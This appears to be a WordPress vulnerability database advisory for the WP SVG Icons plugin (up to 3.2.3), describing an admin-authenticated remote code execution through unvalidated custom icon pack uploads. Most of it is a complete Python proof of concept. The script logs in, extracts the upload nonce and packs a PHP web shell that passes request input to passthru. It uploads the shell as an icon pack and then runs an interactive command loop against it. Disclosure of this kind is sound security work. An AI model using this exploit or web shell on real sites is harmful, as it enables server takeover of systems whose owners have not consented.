WordPress Plugin Vulnerabilities
WP SVG Icons <= 3.2.3 - Admin+ Remote Code Execution (RCE)
Description
The plugin does not properly validate uploaded custom icon packs, allowing an high privileged user like an admin to upload a zip file containing malicious php code, leading to remote code execution.
Proof of Concept
import requests import zipfile BASE_URL = "http://localhost:8000" id = "wordpress" pw = "wordpress" def login(id, pw) : # Phase : Login (because, we need a nonce value) sess = requests.Session() sess.post( BASE_URL + "/wp-login.php", data = { 'log': id, 'pwd': pw, 'wp-submit': '%EB%A1%9C%EA%B7%B8%EC%9D%B8', 'testcookie': '1' } ).text return sess def exploit(sess) : res = sess.get( BASE_URL + "/wp-admin/admin.php?page=wp-svg-icons-custom-set" ).text res = res[res.find('''wp_svg_icons_upload_validation" value=''') + 39:] _nonce = res[:res.find('"')] with open("shellcode.php", "wb") as f : f.write(b"<?php echo(passthru($_REQUEST['qerogram'])); ?>") with open("selection.json", "w") as f : f.write("{}") with zipfile.ZipFile("output.zip", "w") as ZIP : ZIP.write( "shellcode.php", compress_type=zipfile.ZIP_DEFLATED ) ZIP.write( "selection.json", compress_type=zipfile.ZIP_DEFLATED ) sess.post( BASE_URL + "/wp-admin/admin.php?page=wp-svg-icons-custom-set", data = { "wp_http_referer" : "/wp-admin/admin.php?page=wp-svg-icons-custom-set", "wp_svg_icons_upload_validation" : _nonce }, files = { "custom_icon_pack" : ("qerogram.zip", open("output.zip", "rb")) } ) while True : prompt = input("$ ") if prompt.lower() == "exit" or prompt.lower() == "quit" : break res = sess.post( BASE_URL + "/wp-content/uploads/wp-svg-icons/custom-pack/shellcode.php", data = { "qerogram" : prompt } ) print(res.text) sess = login(id, pw) exploit(sess)
Affects Plugins
References
CVE
Classification
Type
RCE
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
qerogram
Submitter
qerogram
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-18 (about 2 years ago)
Added
2022-05-18 (about 2 years ago)
Last Updated
2023-02-07 (about 1 years ago)